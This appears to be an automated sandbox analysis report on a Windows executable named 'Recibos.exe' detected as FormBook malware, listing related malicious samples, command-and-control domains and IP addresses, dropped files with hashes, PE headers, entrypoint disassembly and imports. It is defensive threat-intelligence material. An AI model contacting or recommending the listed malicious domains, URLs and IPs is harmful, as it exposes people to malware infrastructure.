                                                                38.47.233.21CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • www.qqa79.top/dp98/
                                                                209.74.77.108Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                • www.urbanfashion.website/aezw/
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • www.mindfulmo.life/grm8/
                                                                Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • www.innovateideas.xyz/4wqa/
                                                                IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • www.urbanfashion.website/aezw/
                                                                VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                • www.urbanxplore.info/chlo/?9HaD=WJ8Pjkl58Iqvi8v+346A7W2JCurCP35uavULUkOWxAdWurHwpVHOzp+Wq3EHGCpSI2RFmnu5nAtTba/o9p0CIyXXw9XhC0V5AfBtSRheiGahxikEfA==&wdv4=1RD4
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • www.mindfulmo.life/grm8/
                                                                Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                • www.hobbihub.info/i5gf/
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • www.mindfulmo.life/grm8/

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                www.mindfulmo.lifeCV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.108
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.108
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.108
                                                                www.remedies.proDHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                • 13.248.169.48
                                                                SRT68.exeGet hashmaliciousFormBookBrowse
                                                                • 13.248.169.48
                                                                ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                • 13.248.169.48
                                                                SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                • 13.248.169.48
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • 13.248.169.48
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • 13.248.169.48
                                                                www.caj-bioteaque.onlineOrder MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                • 212.123.41.108
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • 212.123.41.108
                                                                IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • 212.123.41.108

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                AMAZON-02USk5NcGFI29j.exeGet hashmaliciousJigsawBrowse
                                                                • 54.200.77.17
                                                                https://auth.ball.comGet hashmaliciousUnknownBrowse
                                                                • 108.158.75.94
                                                                https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==Get hashmaliciousUnknownBrowse
                                                                • 13.227.8.122
                                                                Valutazione della sicurezza IT - Azione urgente richiesta.htmlGet hashmaliciousUnknownBrowse
                                                                • 13.227.8.16
                                                                PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                • 18.141.10.107
                                                                Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                • 54.150.207.131
                                                                OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                • 54.150.207.131
                                                                OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                • 54.150.207.131
                                                                OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                • 54.150.207.131
                                                                rebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 18.218.112.132
                                                                YURTEH-ASUAYH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                • 45.141.156.114
                                                                BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                • 45.141.156.114
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • 45.141.156.114
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • 45.141.156.114
                                                                Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                • 45.141.156.114
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • 45.141.156.114
                                                                support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 31.42.187.210
                                                                support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 31.42.187.210
                                                                SI HE Voy - TC Relet 11.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 152.89.61.240
                                                                MV ALEXOS_VESSEL'S DESC.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 152.89.61.240
                                                                COGENT-174USrebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 38.181.222.220
                                                                rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 198.242.174.67
                                                                rebirth.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 154.61.11.142
                                                                rebirth.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 38.30.130.166
                                                                rebirth.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 149.122.32.48
                                                                rebirth.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 38.24.82.138
                                                                la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                • 38.46.12.186
                                                                la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                • 154.25.173.195
                                                                la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                • 206.6.183.96
                                                                la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                • 149.127.241.79
                                                                MULTIBAND-NEWHOPEUSSN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.64.190
                                                                DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.107
                                                                SRT68.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.107
                                                                UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.107
                                                                Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.109
                                                                PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.107
                                                                Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.107
                                                                Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 209.74.77.109
                                                                Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.79.42
                                                                SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.107

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\7390-mXL

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\wlanext.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                Category:dropped
                                                                Size (bytes):114688
                                                                Entropy (8bit):0.9746603542602881
                                                                Encrypted:false
                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\aut5E63.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Recibos.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):287744
                                                                Entropy (8bit):7.994028719557274
                                                                Encrypted:true
                                                                SSDEEP:6144:IJzerTInJrmMOq2eCP6GY3E4jufHnzPR9756nOe/F8AYE8oDv57xOQss:oW8nV3OEGYLjmRR54O+8+77xOQss
                                                                MD5:426FE5F001B1ABDB6475555F3A973DCC
                                                                SHA1:2B2B069BC5F1DBC381706ADB14DE03E12A73F96D
                                                                SHA-256:881D592926CE3726F38BA23C11BF40FD27BA45E734357FE17CCA802078C93D00
                                                                SHA-512:4C019945A28F903438D6E57DD8597619AA1A50741D894A20B27258546A186B479A8AA7DFBD042BDD2199B60BCD11E5A750EEDE62103B33BDF4541216F7CF9561
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:~..QHXUFMW6U..X0.SQ3R1QK.UFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1.KXUHV.8U.G...R..se9"+u6;8Q'/#xSW=?\&.3.x'3'w_;n..c.>>W7.\FRqFIW6UNN!1?.lS5.l+?.{)0.O...V4.)...w82.S.r.?.d:2[oQ6.XUFIW6UN..06.P2Rs)..UFIW6UNN.04RZ2Y1Q.\UFIW6UNNX."SQ3B1QK(QFIWvUN^X06QQ3T1QKXUFIQ6UNNX06S!7R1SKXUFIW4U..X0&SQ#R1QKHUFYW6UNNX 6SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNvDS+%3R1..\UFYW6U.JX0&SQ3R1QKXUFIW6UnNXP6SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6U

                                                                C:\Users\user\AppData\Local\Temp\teres

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Recibos.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):287744
                                                                Entropy (8bit):7.994028719557274
                                                                Encrypted:true
                                                                SSDEEP:6144:IJzerTInJrmMOq2eCP6GY3E4jufHnzPR9756nOe/F8AYE8oDv57xOQss:oW8nV3OEGYLjmRR54O+8+77xOQss
                                                                MD5:426FE5F001B1ABDB6475555F3A973DCC
                                                                SHA1:2B2B069BC5F1DBC381706ADB14DE03E12A73F96D
                                                                SHA-256:881D592926CE3726F38BA23C11BF40FD27BA45E734357FE17CCA802078C93D00
                                                                SHA-512:4C019945A28F903438D6E57DD8597619AA1A50741D894A20B27258546A186B479A8AA7DFBD042BDD2199B60BCD11E5A750EEDE62103B33BDF4541216F7CF9561
                                                                Malicious:false
                                                                Preview:~..QHXUFMW6U..X0.SQ3R1QK.UFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1.KXUHV.8U.G...R..se9"+u6;8Q'/#xSW=?\&.3.x'3'w_;n..c.>>W7.\FRqFIW6UNN!1?.lS5.l+?.{)0.O...V4.)...w82.S.r.?.d:2[oQ6.XUFIW6UN..06.P2Rs)..UFIW6UNN.04RZ2Y1Q.\UFIW6UNNX."SQ3B1QK(QFIWvUN^X06QQ3T1QKXUFIQ6UNNX06S!7R1SKXUFIW4U..X0&SQ#R1QKHUFYW6UNNX 6SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNvDS+%3R1..\UFYW6U.JX0&SQ3R1QKXUFIW6UnNXP6SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6UNNX06SQ3R1QKXUFIW6U

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.201633719695125
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:Recibos.exe
                                                                File size:1'219'072 bytes
                                                                MD5:654c0c7e931356faa0396f064994dc50
                                                                SHA1:633bb2be7c1d96741cb53e490ad8c4fa71becead
                                                                SHA256:4c197091ef6ff69cc1b9462d35d7a2652449fd8ce9e141222a9b08c920896e42
                                                                SHA512:9798472238fd15438a1adea69c8a58a36c6715db19451306253e8635621116a76bc1d5f6873e1ae68a6788f3d3f2b8dd5330ffa1421e64b4b6597ad30700ee4c
                                                                SSDEEP:24576:cu6J33O0c+JY5UZ+XC0kGso6Fa1ik2CzlJ1/vZxDOfzWY:Gu0c++OCvkGs9Fa1ikNzlJxjDLY
                                                                TLSH:FD45CF2273DDC360CB769133BF69B7016EBF78614630B85B2F980D7DA950162262D7A3
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                File Icon

                                                                Icon Hash:aaf3e3e3938382a0

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x427dcd
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6752E821 [Fri Dec 6 12:03:45 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                Entrypoint Preview

                                                                Instruction
                                                                call 00007FA7F4B0F6AAh
                                                                jmp 00007FA7F4B02474h
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push edi
                                                                push esi
                                                                mov esi, dword ptr [esp+10h]
                                                                mov ecx, dword ptr [esp+14h]
                                                                mov edi, dword ptr [esp+0Ch]
                                                                mov eax, ecx
                                                                mov edx, ecx
                                                                add eax, esi
                                                                cmp edi, esi
                                                                jbe 00007FA7F4B025FAh
                                                                cmp edi, eax
                                                                jc 00007FA7F4B0295Eh
                                                                bt dword ptr [004C31FCh], 01h
                                                                jnc 00007FA7F4B025F9h
                                                                rep movsb
                                                                jmp 00007FA7F4B0290Ch
                                                                cmp ecx, 00000080h
                                                                jc 00007FA7F4B027C4h
                                                                mov eax, edi
                                                                xor eax, esi
                                                                test eax, 0000000Fh
                                                                jne 00007FA7F4B02600h
                                                                bt dword ptr [004BE324h], 01h
                                                                jc 00007FA7F4B02AD0h
                                                                bt dword ptr [004C31FCh], 00000000h
                                                                jnc 00007FA7F4B0279Dh
                                                                test edi, 00000003h
                                                                jne 00007FA7F4B027AEh
                                                                test esi, 00000003h
                                                                jne 00007FA7F4B0278Dh
                                                                bt edi, 02h
                                                                jnc 00007FA7F4B025FFh
                                                                mov eax, dword ptr [esi]
                                                                sub ecx, 04h
                                                                lea esi, dword ptr [esi+04h]
                                                                mov dword ptr [edi], eax
                                                                lea edi, dword ptr [edi+04h]
                                                                bt edi, 03h
                                                                jnc 00007FA7F4B02603h
                                                                movq xmm1, qword ptr [esi]
                                                                sub ecx, 08h
                                                                lea esi, dword ptr [esi+08h]
                                                                movq qword ptr [edi], xmm1
                                                                lea edi, dword ptr [edi+08h]
                                                                test esi, 00000007h
                                                                je 00007FA7F4B02655h
                                                                bt esi, 03h
                                                                jnc 00007FA7F4B026A8h

                                                                Rich Headers

                                                                Programming Language:
                                                                • [ASM] VS2013 build 21005
                                                                • [ C ] VS2013 build 21005
                                                                • [C++] VS2013 build 21005
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [ASM] VS2013 UPD4 build 31101
                                                                • [RES] VS2013 build 21005
                                                                • [LNK] VS2013 UPD4 build 31101

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x61050.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1290000x711c.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0xc70000x610500x61200051e2cbed5dc2453fc4f19e29cb03bfcFalse0.9318467462998713data7.9043916441372355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x1290000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                RT_RCDATA0xcf7b80x58317data1.000334958296308
                                                                RT_GROUP_ICON0x127ad00x76dataEnglishGreat Britain0.6610169491525424
                                                                RT_GROUP_ICON0x127b480x14dataEnglishGreat Britain1.25
                                                                RT_GROUP_ICON0x127b5c0x14dataEnglishGreat Britain1.15
                                                                RT_GROUP_ICON0x127b700x14dataEnglishGreat Britain1.25
                                                                RT_VERSION0x127b840xdcdataEnglishGreat Britain0.6181818181818182
                                                                RT_MANIFEST0x127c600x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                Imports

                                                                DLLImport
                                                                WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                UxTheme.dllIsThemeActive
                                                                KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
